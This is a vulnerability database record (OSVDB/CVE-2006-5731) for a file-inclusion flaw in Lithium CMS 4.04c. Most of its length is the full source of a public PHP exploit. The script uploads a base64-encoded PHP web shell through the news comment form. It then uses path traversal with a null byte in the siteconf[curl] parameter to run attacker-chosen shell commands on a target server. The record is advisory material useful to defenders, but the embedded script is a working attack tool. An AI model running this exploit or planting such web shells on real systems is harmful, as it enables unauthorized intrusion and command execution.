{"bulletinFamily": "software", "viewCount": 5, "reporter": "OSVDB", "references": [], "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## References:\nVendor URL: http://s.cmsdev.ru/\n[Secunia Advisory ID:22593](https://secuniaresearch.flexerasoftware.com/advisories/22593/)\nISS X-Force ID: 29966\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2702\nFrSIRT Advisory: ADV-2006-4361\n[CVE-2006-5731](https://vulners.com/cve/CVE-2006-5731)\n", "affectedSoftware": [], "href": "https://vulners.com/osvdb/OSVDB:30217", "modified": "2006-11-02T11:48:43", "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2017-04-28T13:20:26", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-5731"]}, {"type": "exploitdb", "idList": ["EDB-ID:2702"]}], "modified": "2017-04-28T13:20:26", "rev": 2}, "vulnersScore": 6.5}, "id": "OSVDB:30217", "title": "Lithium CMS /classes/index.php siteconf[curl] Traversal Arbitrary File Execution", "edition": 1, "published": "2006-11-02T11:48:43", "type": "osvdb", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "cvelist": ["CVE-2006-5731"], "lastseen": "2017-04-28T13:20:26"}

{"cve": [{"lastseen": "2020-12-09T19:23:49", "description": "Directory traversal vulnerability in classes/index.php in Lithium CMS 4.04c and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the siteconf[curl] parameter, as demonstrated by a POST to news/comment.php containing PHP code, which is stored under db/comments/news/ and included by classes/index.php.", "edition": 5, "cvss3": {}, "published": "2006-11-06T18:07:00", "title": "CVE-2006-5731", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-5731"], "modified": "2017-10-19T01:29:00", "cpe": ["cpe:/a:lithium_cms:lithium_cms:4.04c"], "id": "CVE-2006-5731", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5731", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:lithium_cms:lithium_cms:4.04c:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T16:51:19", "description": "Lithium CMS <= 4.04c (classes/index.php) Local File Include Exploit. CVE-2006-5731. Webapps exploit for php platform", "published": "2006-11-02T00:00:00", "type": "exploitdb", "title": "Lithium CMS <= 4.04c classes/index.php Local File Include Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5731"], "modified": "2006-11-02T00:00:00", "id": "EDB-ID:2702", "href": "https://www.exploit-db.com/exploits/2702/", "sourceData": "<?\n\nprint '\n::::::::: :::::::::: ::: ::: ::::::::::: ::: \n:+: :+: :+: :+: :+: :+: :+: \n+:+ +:+ +:+ +:+ +:+ +:+ +:+ \n+#+ +:+ +#++:++# +#+ +:+ +#+ +#+ \n+#+ +#+ +#+ +#+ +#+ +#+ +#+ \n#+# #+# #+# #+#+#+# #+# #+# \n######### ########## ### ########### ########## \n::::::::::: :::::::::: ::: :::: :::: \n :+: :+: :+: :+: +:+:+: :+:+:+ \n +:+ +:+ +:+ +:+ +:+ +:+:+ +:+ \n +#+ +#++:++# +#++:++#++: +#+ +:+ +#+ \n +#+ +#+ +#+ +#+ +#+ +#+ \n #+# #+# #+# #+# #+# #+# \n ### ########## ### ### ### ### \n\t\n - - [DEVIL TEAM THE BEST POLISH TEAM] - -\n \nLithium CMS <= 4.04c Remote Code Execution Exploit\n\n[Script name: Lithium 4.04c\n[Script site: https://sourceforge.net/projects/lit/\n\nFind by: Kacper (a.k.a Rahim)\n\n\n========> DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam <========\n\n\n\nContact: kacper1964@yahoo.pl\n\nor\n\nhttp://www.rahim.webd.pl/\n\n\n(c)od3d by Kacper\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\nGreetings DragonHeart and all DEVIL TEAM Patriots :)\n- Leito & Leon \nTomZen, Gelo, Ramzes, DMX, Ci2u, Larry, @steriod, Drzewko, CrazzyIwan, Rammstein\nAdam., Kicaj., DeathSpeed, Arkadius, Michas, pepi, nukedclx, SkD, MXZ, sysios, \nmIvus, nukedclx, SkD, wacky, xoron\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n Greetings for 4ll Fusi0n Group members ;-)\n\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n';\n\nif ($argc<5) {\nprint_r('\n-----------------------------------------------------------------------------\nUsage: php '.$argv[0].' host path comments_id cmd OPTIONS\nhost: target server (ip/hostname)\npath: Lithium path\ncomments_id: number of news what is in site\ncmd: a shell command (ls -la)\nOptions:\n -p[port]: specify a port other than 80\n -P[ip:port]: specify a proxy\nExample:\nphp '.$argv[0].' 2.2.2.2 /Lithium/ 2006.10.30 ls -la -P1.1.1.1:80\nphp '.$argv[0].' 1.1.1.1 / -p81\n-----------------------------------------------------------------------------\n');\n\ndie;\n}\n\nerror_reporting(0);\nini_set(\"max_execution_time\",0);\nini_set(\"default_socket_timeout\",5);\n\nfunction quick_dump($string)\n{\n $result='';$exa='';$cont=0;\n for ($i=0; $i<=strlen($string)-1; $i++)\n {\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\n {$result.=\" .\";}\n else\n {$result.=\" \".$string[$i];}\n if (strlen(dechex(ord($string[$i])))==2)\n {$exa.=\" \".dechex(ord($string[$i]));}\n else\n {$exa.=\" 0\".dechex(ord($string[$i]));}\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\n }\n return $exa.\"\\r\\n\".$result;\n}\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\nfunction sendpacket($packet)\n{\n global $proxy, $host, $port, $html, $proxy_regex;\n if ($proxy=='') {\n $ock=fsockopen(gethostbyname($host),$port);\n if (!$ock) {\n echo 'No response from '.$host.':'.$port; die;\n }\n }\n else {\n\t$c = preg_match($proxy_regex,$proxy);\n if (!$c) {\n echo 'Not a valid proxy...';die;\n }\n $parts=explode(':',$proxy);\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\n $ock=fsockopen($parts[0],$parts[1]);\n if (!$ock) {\n echo 'No response from proxy...';die;\n\t}\n }\n fputs($ock,$packet);\n if ($proxy=='') {\n $html='';\n while (!feof($ock)) {\n $html.=fgets($ock);\n }\n }\n else {\n $html='';\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\n $html.=fread($ock,1);\n }\n }\n fclose($ock);\n}\nfunction make_seed()\n{\n list($usec, $sec) = explode(' ', microtime());\n return (float) $sec + ((float) $usec * 100000);\n}\n\n$host=$argv[1];\n$path=$argv[2];\n$comments_id=$argv[3];\n$cmd=\"\";\n\n$port=80;\n$proxy=\"\";\nfor ($i=4; $i<$argc; $i++){\n$temp=$argv[$i][0].$argv[$i][1];\nif (($temp<>\"-p\") and ($temp<>\"-P\")) {$cmd.=\" \".$argv[$i];}\nif ($temp==\"-p\")\n{\n $port=str_replace(\"-p\",\"\",$argv[$i]);\n}\nif ($temp==\"-P\")\n{\n $proxy=str_replace(\"-P\",\"\",$argv[$i]);\n}\n}\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\n$hauru = base64_decode(\"PD9waHAgb2JfY2xlYW4oKTsvL1J1Y2hvbXkgemFtZWsgSGF1cnUgOy0pZWNobyIuLi5IYWNrZXIuLkthY3Blci4uTWFkZS4uaW4uLlBvbGFuZCEhLi4uREVWSUwuVEVBTS4udGhlLi5iZXN0Li5wb2xpc2guLnRlYW0uLkdyZWV0ei4uLiI7ZWNobyIuLi5HbyBUbyBERVZJTCBURUFNIElSQzogNzIuMjAuMTguNjo2NjY3ICNkZXZpbHRlYW0iO2VjaG8iLi4uREVWSUwgVEVBTSBTSVRFOiBodHRwOi8vd3d3LnJhaGltLndlYmQucGwvIjtpbmlfc2V0KCJtYXhfZXhlY3V0aW9uX3RpbWUiLDApO2VjaG8gIkhhdXJ1IjtwYXNzdGhydSgkX1NFUlZFUltIVFRQX0hBVVJVXSk7ZGllOz8+\");\n$data.='-----------------------------7d6224c08dc\nContent-Disposition: form-data; name=\"name\"\n\nHauru\n-----------------------------7d6224c08dc\nContent-Disposition: form-data; name=\"www\"\n\nhttp://www.rahim.webd.pl/\n-----------------------------7d6224c08dc\nContent-Disposition: form-data; name=\"text\"\n\n'.$hauru.'\n-----------------------------7d6224c08dc\nContent-Disposition: form-data; name=\"new_comment\"\n\nAdd comment\n-----------------------------7d6224c08dc--\n';\n\n\necho \"creat hauru...\\n\";\n$packet =\"POST \".$p.\"news/comment.php/\".$comments_id.\" HTTP/1.0\\r\\n\";\n$packet.=\"Content-Type: multipart/form-data; boundary=---------------------------7d6224c08dc\\r\\n\";\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\n$packet.=$data;\nsendpacket($packet);\nsleep(1);\n\necho \"remote code execution...\\n\";\n$packet =\"GET \".$p.\"classes/index.php?siteconf[curl]=../../../db/comments/news/\".$comments_id.\"%00 HTTP/1.1\\r\\n\";\n$packet.=\"HAURU: \".$cmd.\"\\r\\n\";\n$packet.=\"Host: \".$host.\"\\r\\n\";\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\nsendpacket($packet);\nif (strstr($html,\"Hauru\"))\n{\n$temp=explode(\"Hauru\",$html);\ndie($temp[1]);\n}\necho \"Exploit err0r :(\";\necho \"Go to DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam\";\n?>\n\n# milw0rm.com [2006-11-02]\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/2702/"}]}